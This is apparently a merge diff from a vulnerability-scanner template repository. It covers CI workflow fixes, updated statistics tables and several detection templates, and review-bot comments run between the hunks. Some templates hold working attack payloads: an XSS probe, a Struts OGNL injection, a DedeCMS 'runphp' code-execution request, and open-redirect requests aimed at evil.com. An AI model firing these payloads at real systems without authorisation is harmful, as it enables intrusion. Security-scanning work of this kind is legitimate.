Merge branch 'main' into patch-1
commit
0597e2bbd4
|
@ -15,12 +15,12 @@ jobs:
|
|||
- name: Get Github tag
|
||||
id: meta
|
||||
run: |
|
||||
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
|
||||
curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Setup CVE annotate
|
||||
if: steps.meta.outputs.tag != ''
|
||||
if: steps.meta.outputs.TAG != ''
|
||||
env:
|
||||
VERSION: ${{ steps.meta.outputs.tag }}
|
||||
VERSION: ${{ steps.meta.outputs.TAG }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip
|
||||
sudo unzip cve-annotate.zip -d /usr/local/bin
|
||||
|
@ -30,10 +30,10 @@ jobs:
|
|||
id: cve-annotate
|
||||
run: |
|
||||
cve-annotate -i . -d .
|
||||
echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.cve-annotate.outputs.changes > 0
|
||||
if: steps.cve-annotate.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
|
@ -42,7 +42,7 @@ jobs:
|
|||
git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
if: steps.cve-annotate.outputs.changes > 0
|
||||
if: steps.cve-annotate.outputs.CHANGES > 0
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
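Review bot: The new `TAG` line on L20 still emits a bogus value when the GitHub API call fails: `curl --silent` exits 0 on an HTTP 403 (the unauthenticated rate limit is easy to hit from shared runners) and `jq -r .tag_name` then prints the literal string `null`, which satisfies the `TAG != ''` guard on L31 and sends the next step to fetch `releases/download/null/cve-annotate.zip`. Make the failure visible instead: `curl -sSf "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r '.tag_name // empty' | xargs -I {} echo TAG={} >> "$GITHUB_OUTPUT"` — `-f` fails on a non-2xx response, `// empty` prints nothing for a missing field so the guard actually fires, and quoting `$GITHUB_OUTPUT` avoids word-splitting surprises. Note that a bare `run:` uses `bash -e` without `pipefail`, so add `shell: bash` to the step (or `set -o pipefail`) or the curl failure is swallowed by the pipeline. Since L49 unpacks the download into `/usr/local/bin` with sudo, verifying the zip against the release's checksums file before installing would close the remaining gap.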
|
||||
|
|
|
@ -30,17 +30,17 @@ jobs:
|
|||
id: readme-update
|
||||
run: |
|
||||
python .github/scripts/update-readme.py
|
||||
echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.readme-update.outputs.changes > 0
|
||||
if: steps.readme-update.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto README Update [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
if: steps.readme-update.outputs.changes > 0
|
||||
if: steps.readme-update.outputs.CHANGES > 0
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
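Review bot: `CHANGES` on L136 counts every line of `git status -s`, including untracked `??` entries, while the commit step on L159 uses `git commit -a`, which only stages modifications to already-tracked files; if `update-readme.py` ever creates a new file the guard on L147 passes, nothing is staged, and the job fails at `git commit` rather than at the script. Either count only tracked changes — `git status -s --untracked-files=no | wc -l | xargs -I {} echo CHANGES={} >> "$GITHUB_OUTPUT"` — or `git add` the intended paths before committing. Quoting `$GITHUB_OUTPUT` is cheap here and worth keeping consistent across these workflows even though the path is runner-controlled.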
|
||||
|
|
|
@ -0,0 +1,38 @@
|
|||
name: 📝 Template Checksum
|
||||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.18
|
||||
|
||||
- name: install checksum generator
|
||||
run: |
|
||||
go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@dev
|
||||
|
||||
- name: generate checksum
|
||||
run: |
|
||||
generate-checksum /home/runner/work/nuclei-templates/nuclei-templates/ templates-checksum.txt
|
||||
|
||||
- name: Commit files
|
||||
run: |
|
||||
git pull
|
||||
git add templates-checksum.txt
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto Generated Templates Checksum [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: master
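Review bot: This workflow produces `templates-checksum.txt`, an integrity artifact, yet every component it runs is pulled from a mutable ref — `actions/checkout@master` (L222), `go install .../generate-checksum@dev` (L242) and `ad-m/github-push-action@master` (L284) — and the result is pushed straight to `master` with the repository `GITHUB_TOKEN`. Anyone who can move those refs can change what gets hashed or what gets committed, so pin the actions to a full commit SHA (`uses: actions/checkout@<sha>  # vX.Y.Z`) and the generator to a release tag or module version (`go install github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@<tag>`). The `git pull` on L264 looks fragile for the `push: tags` trigger: the checkout is a detached HEAD at the tag with no upstream to pull from, and the later push goes to `master` from a commit made off that tag — confirm this path has been exercised, or check out `master` explicitly with `ref: master` on the checkout step. Minor: `/home/runner/work/nuclei-templates/nuclei-templates/` on L253 hard-codes the runner layout; `${{ github.workspace }}` or `.` says the same thing portably.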
|
|
@ -14,7 +14,7 @@ jobs:
|
|||
with:
|
||||
go-version: 1.17
|
||||
|
||||
- name: Intalling Indexer
|
||||
- name: Installing Indexer
|
||||
run: |
|
||||
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
|
||||
git clone https://github.com/projectdiscovery/nucleish-api.git
|
||||
|
|
|
@ -11,12 +11,12 @@ jobs:
|
|||
- name: Get Github tag
|
||||
id: meta
|
||||
run: |
|
||||
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
|
||||
curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Setup Nuclei
|
||||
if: steps.meta.outputs.tag != ''
|
||||
if: steps.meta.outputs.TAG != ''
|
||||
env:
|
||||
VERSION: ${{ steps.meta.outputs.tag }}
|
||||
VERSION: ${{ steps.meta.outputs.TAG }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
|
||||
sudo unzip nuclei*.zip -d /usr/local/bin
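Review bot: The `TAG` output on L340 has no failure path: `curl --silent` returns success on an HTTP 403 (unauthenticated API rate limit) and `jq -r .tag_name` then emits the string `null`, so the `TAG != ''` guard on L351 passes and L366 tries to fetch `nuclei_ull_linux_amd64.zip` (`${VERSION:1}` strips the first character of `null`). Use `curl -sSf ... | jq -r '.tag_name // empty'` and set `shell: bash` on the step so the runner's `pipefail` turns the curl failure into a step failure. The binary that L369 installs into `/usr/local/bin` with sudo is never verified; nuclei releases ship a checksums file next to the zip, so fetching it and running `sha256sum --ignore-missing -c` before `unzip` would cover that — confirm the exact asset name against the release page.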
|
||||
|
|
|
@ -13,7 +13,7 @@ jobs:
|
|||
- uses: actions/checkout@master
|
||||
- uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.17
|
||||
go-version: 1.18
|
||||
|
||||
- name: Installing Template Stats
|
||||
run: |
|
||||
|
@ -37,10 +37,10 @@ jobs:
|
|||
|
||||
- name: Get statistical changes
|
||||
id: stats
|
||||
run: echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
run: git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.stats.outputs.changes > 0
|
||||
if: steps.stats.outputs.CHANGES > 0
|
||||
run: |
|
||||
git add TEMPLATES-STATS.*
|
||||
git add TOP-10.md
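Review bot: `go-version: 1.18` on L390 is an unquoted YAML float; it survives only because `1.18` happens to round-trip, whereas the next bump to `1.20` would be parsed as `1.2` and resolve to Go 1.2. Write it as a string, `go-version: '1.18'`. The `run:` one-liner on L416 appends to `$GITHUB_OUTPUT` unquoted; `>> "$GITHUB_OUTPUT"` is the safer habit.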
|
||||
|
|
|
@ -1,32 +1,10 @@
|
|||
cves/2022/CVE-2022-22242.yaml
|
||||
default-logins/xnat-default-login.yaml
|
||||
exposed-panels/allied-telesis-exposure.yaml
|
||||
exposed-panels/ampache-panel.yaml
|
||||
exposed-panels/cisco/cisco-anyconnect-vpn.yaml
|
||||
exposed-panels/connectwise-backup-manager.yaml
|
||||
exposed-panels/gira-homeserver-homepage.yaml
|
||||
exposed-panels/hangfire-dashboard.yaml
|
||||
exposed-panels/nginx-admin-panel.yaml
|
||||
exposed-panels/nginx-ui-dashboard.yaml
|
||||
exposed-panels/nport-web-console.yaml
|
||||
exposed-panels/xnat-login.yaml
|
||||
misconfiguration/debug/ampache-debug.yaml
|
||||
misconfiguration/debug/flask-werkzeug-debug.yaml
|
||||
misconfiguration/debug/github-debug.yaml
|
||||
misconfiguration/global-traffic-statistics.yaml
|
||||
misconfiguration/healthchecks-ui-exposure.yaml
|
||||
misconfiguration/hfs-exposure.yaml
|
||||
misconfiguration/installer/ampache-music-installer.yaml
|
||||
misconfiguration/installer/moodle-installer.yaml
|
||||
misconfiguration/installer/sms-installer.yaml
|
||||
misconfiguration/questdb-console.yaml
|
||||
misconfiguration/qvidium-management-system-exposed.yaml
|
||||
misconfiguration/rekognition-image-validation.yaml
|
||||
misconfiguration/smarterstats-setup.yaml
|
||||
network/detection/axigen-mail-server-detect.yaml
|
||||
network/detection/riak-detect.yaml
|
||||
technologies/catalog-creator-detect.yaml
|
||||
technologies/coming-soon-page-detect.yaml
|
||||
technologies/google/cloud-run-default-page.yaml
|
||||
technologies/php-detect.yaml
|
||||
technologies/vivotex-web-console-detect.yaml
|
||||
cves/2022/CVE-2022-0786.yaml
|
||||
cves/2022/CVE-2022-25082.yaml
|
||||
exposed-panels/creatio-login-panel.yaml
|
||||
exposed-panels/posthog-admin-panel.yaml
|
||||
exposed-panels/webuzo-admin-panel.yaml
|
||||
exposed-panels/xfinity-panel.yaml
|
||||
iot/carel-plantvisor-panel.yaml
|
||||
iot/hue-personal-wireless-panel.yaml
|
||||
network/exposed-dockerd.yaml
|
||||
technologies/aws/amazon-ec2-detect.yaml
|
||||
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1504 | dhiyaneshdk | 677 | cves | 1482 | info | 1579 | http | 4129 |
|
||||
| panel | 721 | daffainfo | 656 | exposed-panels | 727 | high | 1118 | file | 77 |
|
||||
| edb | 574 | pikpikcu | 338 | vulnerabilities | 518 | medium | 810 | network | 63 |
|
||||
| xss | 525 | pdteam | 273 | misconfiguration | 305 | critical | 532 | dns | 17 |
|
||||
| lfi | 517 | geeknik | 196 | technologies | 299 | low | 242 | | |
|
||||
| exposure | 487 | dwisiswant0 | 171 | exposures | 299 | unknown | 20 | | |
|
||||
| wordpress | 453 | 0x_akoko | 167 | token-spray | 235 | | | | |
|
||||
| cve2021 | 363 | pussycat0x | 151 | workflows | 190 | | | | |
|
||||
| wp-plugin | 348 | princechaddha | 151 | default-logins | 110 | | | | |
|
||||
| rce | 342 | ritikchaddha | 149 | file | 77 | | | | |
|
||||
| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 |
|
||||
| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 |
|
||||
| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 |
|
||||
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
|
||||
| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | |
|
||||
| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | |
|
||||
| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | |
|
||||
| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | |
|
||||
| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
|
||||
| tech | 360 | princechaddha | 153 | file | 78 | | | | |
|
||||
|
||||
**306 directories, 4520 files**.
|
||||
**328 directories, 4791 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
4353
TEMPLATES-STATS.md
4353
TEMPLATES-STATS.md
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1504 | dhiyaneshdk | 677 | cves | 1482 | info | 1579 | http | 4129 |
|
||||
| panel | 721 | daffainfo | 656 | exposed-panels | 727 | high | 1118 | file | 77 |
|
||||
| edb | 574 | pikpikcu | 338 | vulnerabilities | 518 | medium | 810 | network | 63 |
|
||||
| xss | 525 | pdteam | 273 | misconfiguration | 305 | critical | 532 | dns | 17 |
|
||||
| lfi | 517 | geeknik | 196 | technologies | 299 | low | 242 | | |
|
||||
| exposure | 487 | dwisiswant0 | 171 | exposures | 299 | unknown | 20 | | |
|
||||
| wordpress | 453 | 0x_akoko | 167 | token-spray | 235 | | | | |
|
||||
| cve2021 | 363 | pussycat0x | 151 | workflows | 190 | | | | |
|
||||
| wp-plugin | 348 | princechaddha | 151 | default-logins | 110 | | | | |
|
||||
| rce | 342 | ritikchaddha | 149 | file | 77 | | | | |
|
||||
| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 |
|
||||
| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 |
|
||||
| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 |
|
||||
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
|
||||
| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | |
|
||||
| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | |
|
||||
| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | |
|
||||
| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | |
|
||||
| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
|
||||
| tech | 360 | princechaddha | 153 | file | 78 | | | | |
|
||||
|
|
|
@ -1368,5 +1368,16 @@
|
|||
"website": "",
|
||||
"email": ""
|
||||
}
|
||||
},
|
||||
{
|
||||
"author": "heywoodlh",
|
||||
"links": {
|
||||
"github": "https://www.github.com/heywoodlh",
|
||||
"twitter": "",
|
||||
"linkedin": "",
|
||||
"website": "https://the-empire.systems",
|
||||
"email": ""
|
||||
}
|
||||
}
|
||||
|
||||
]
|
||||
|
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2008-6465
|
||||
|
||||
info:
|
||||
name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
|
||||
reference:
|
||||
- http://www.xssing.com/index.php?x=3&y=65
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2008-6465
|
||||
cwe-id: CWE-80
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Parallels H-Sphere
|
||||
tags: cve,cve2008,xss,parallels,h-sphere
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '\" onfocus=alert(document.domain); autofocus'
|
||||
- 'Please enter login name & password'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
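Review bot: The `shodan-query` on L866 is missing its closing quote — `title:"Parallels H-Sphere` — so anyone pasting it into Shodan gets a parse error; it should read `shodan-query: title:"Parallels H-Sphere"`. `verified: true` on L863 is an unquoted boolean while the rest of this commit is converting templates to the string form `verified: "true"` (see the CVE-2017-14186 and CVE-2018-17422 hunks), so the new template should use the quoted form as well. The GET on L883 sends `errcode=` whereas the description on L827 names `err`, `errorcode` and `login` as the vulnerable parameters — the reflected `login` value is what the matcher keys on, so this probably still works, but confirm the parameter name against the advisory before it is copied elsewhere.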
|
|
@ -13,10 +13,11 @@ info:
|
|||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2008-6982
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: devalcms,xss,cms,edb
|
||||
tags: cve,cve2008,devalcms,xss,cms,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2012-0394
|
||||
|
||||
info:
|
||||
name: Apache Struts Dev Mode OGNL Injection
|
||||
author: tess
|
||||
severity: critical
|
||||
description: |
|
||||
The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
|
||||
reference:
|
||||
- https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/
|
||||
- https://www.exploit-db.com/exploits/31434
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394
|
||||
- http://www.exploit-db.com/exploits/18329
|
||||
classification:
|
||||
cve-id: CVE-2012-0394
|
||||
metadata:
|
||||
shodan-query: html:"Struts Problem Report"
|
||||
verified: "true"
|
||||
tags: ognl,injection,edb,cve,cve2012,apache,struts
|
||||
|
||||
variables:
|
||||
first: "{{rand_int(1000, 9999)}}"
|
||||
second: "{{rand_int(1000, 9999)}}"
|
||||
result: "{{to_number(first)*to_number(second)}}"
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '{{result}}'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
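Review bot: The `classification` block on L1021–L1024 carries only `cve-id`; the sibling templates in this commit all include `cvss-metrics`, `cvss-score` and `cwe-id`, and `severity: critical` on L997 has nothing backing it, so fill those in from NVD or note why a vector is unavailable. The request path `/portal/displayAPSForm.action` on L1064 looks like the specific target from the exploit-db PoC; the description on L1003 says the DebuggingInterceptor affects any Struts action in dev mode, so consider also probing a generic `.action` endpoint so the template is not limited to one application — I can only see this one path, so treat that as a question. The arithmetic probe (`{{first}}*{{second}}` checked against `{{result}}`) is a good choice: it proves OGNL evaluation without executing a command on the target.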
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2016-10033
|
||||
|
||||
info:
|
||||
name: WordPress PHPMailer < 5.2.18 Remote Code Execution
|
||||
name: WordPress PHPMailer < 5.2.18 - Remote Code Execution
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport.
|
||||
|
|
|
@ -9,13 +9,17 @@ info:
|
|||
reference:
|
||||
- https://www.fortiguard.com/psirt/FG-IR-17-242
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-14186
|
||||
- https://fortiguard.com/advisory/FG-IR-17-242
|
||||
- https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2017-14186
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: port:10443 http.favicon.hash:945408572
|
||||
verified: "true"
|
||||
tags: cve,cve2017,fortigate,xss,fortinet
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
|
@ -40,4 +40,4 @@ requests:
|
|||
- "SQLServer"
|
||||
condition: and
|
||||
|
||||
# Enhanced by cs on 2022/10/06
|
||||
# Enhanced by cs on 2022/10/24
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
reference:
|
||||
- https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-8917
|
||||
- http://www.securitytracker.com/id/1038522
|
||||
- https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
|
@ -15,7 +15,7 @@ info:
|
|||
cvss-score: 9.8
|
||||
cve-id: CVE-2018-1000861
|
||||
cwe-id: CWE-502
|
||||
tags: kev,vulhub,cve,cve2018,jenkin,rce,jenkins
|
||||
tags: kev,vulhub,cve,cve2018,rce,jenkins
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2018-14912
|
||||
|
||||
info:
|
||||
name: cgit < 1.2.1 Directory Traversal
|
||||
name: cgit < 1.2.1 - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2018-17422
|
||||
|
||||
info:
|
||||
name: dotCMS <5.0.2 - Open Redirect
|
||||
name: DotCMS < 5.0.2 - Open Redirect
|
||||
author: 0x_Akoko,daffainfo
|
||||
severity: medium
|
||||
description: |
|
||||
|
@ -16,27 +16,22 @@ info:
|
|||
cve-id: CVE-2018-17422
|
||||
cwe-id: CWE-601
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"dotCMS"
|
||||
verified: "true"
|
||||
tags: cve,cve2018,redirect,dotcms
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh'
|
||||
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh'
|
||||
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com'
|
||||
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "self.location = 'http://www.interact.sh'"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- "self.location = 'http://evil.com'"
|
||||
- "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'"
|
||||
|
||||
# Enhanced by md on 2022/10/13
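Review bot: The second word on L1404 expects `http://www.evil.com` (`http\x3a\x2f\x2fwww\x2eevil\x2ecom`) but the second path on L1362 sends `hostname=evil.com` without `www.`, so unless dotCMS prepends `www.` itself that matcher can never fire and the `page_preview_popup.jsp` vector is effectively untested; make the two agree, e.g. `hostname=www.evil.com` on L1362 or drop `www\x2e` from the matcher. With the status matcher removed, `matchers-condition: and` on L1370 now governs a single matcher and is dead — harmless, but worth deleting so the next reader does not go looking for the second matcher.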
|
||||
|
|
|
@ -78,4 +78,4 @@ requests:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/10/06
|
||||
# Enhanced by mp on 2022/10/07
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}"
|
||||
- "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -27,9 +27,7 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "phpinfo"
|
||||
- "PHP Version"
|
||||
condition: and
|
||||
- "4cc32a3a81d2bb37271934a48ce4468a"
|
||||
|
||||
- type: status
|
||||
status:
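Review bot: The replacement matcher on L1483 is a bare 32-hex literal; the reader has to trust that `4cc32a3a81d2bb37271934a48ce4468a` is `md5("CVE-2018-7700")`, which is what the payload on L1450 computes. Add an inline comment so it can be checked and regenerated: `- "4cc32a3a81d2bb37271934a48ce4468a"  # md5("CVE-2018-7700")`. Swapping `phpinfo()` for an `echo md5(...)` probe is the right direction — the response no longer carries the target's PHP configuration — but the payload still runs arbitrary PHP through `runphp='yes'`, so the template's severity and tags should keep describing it as code execution. The enclosing `matchers:` list begins above this hunk.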
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-10232
|
||||
|
||||
info:
|
||||
name: Teclib GLPI <= 9.3.3 Unauthenticated SQL Injection
|
||||
name: Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection
|
||||
author: RedTeamBrasil
|
||||
severity: critical
|
||||
description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-12314
|
||||
|
||||
info:
|
||||
name: Deltek Maconomy 2.2.5 Local File Inclusion
|
||||
name: Deltek Maconomy 2.2.5 - Local File Inclusion
|
||||
author: madrobot
|
||||
severity: critical
|
||||
description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-12725
|
||||
|
||||
info:
|
||||
name: Zeroshell 3.9.0 Remote Command Execution
|
||||
name: Zeroshell 3.9.0 - Remote Command Execution
|
||||
author: dwisiswant0,akincibor
|
||||
severity: critical
|
||||
description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-13101
|
||||
|
||||
info:
|
||||
name: D-Link DIR-600M Authentication Bypass
|
||||
name: D-Link DIR-600M - Authentication Bypass
|
||||
author: Suman_Kar
|
||||
severity: critical
|
||||
description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-13392
|
||||
|
||||
info:
|
||||
name: MindPalette NateMail 3.0.15 Cross-Site Scripting
|
||||
name: MindPalette NateMail 3.0.15 - Cross-Site Scripting
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-15107
|
||||
|
||||
info:
|
||||
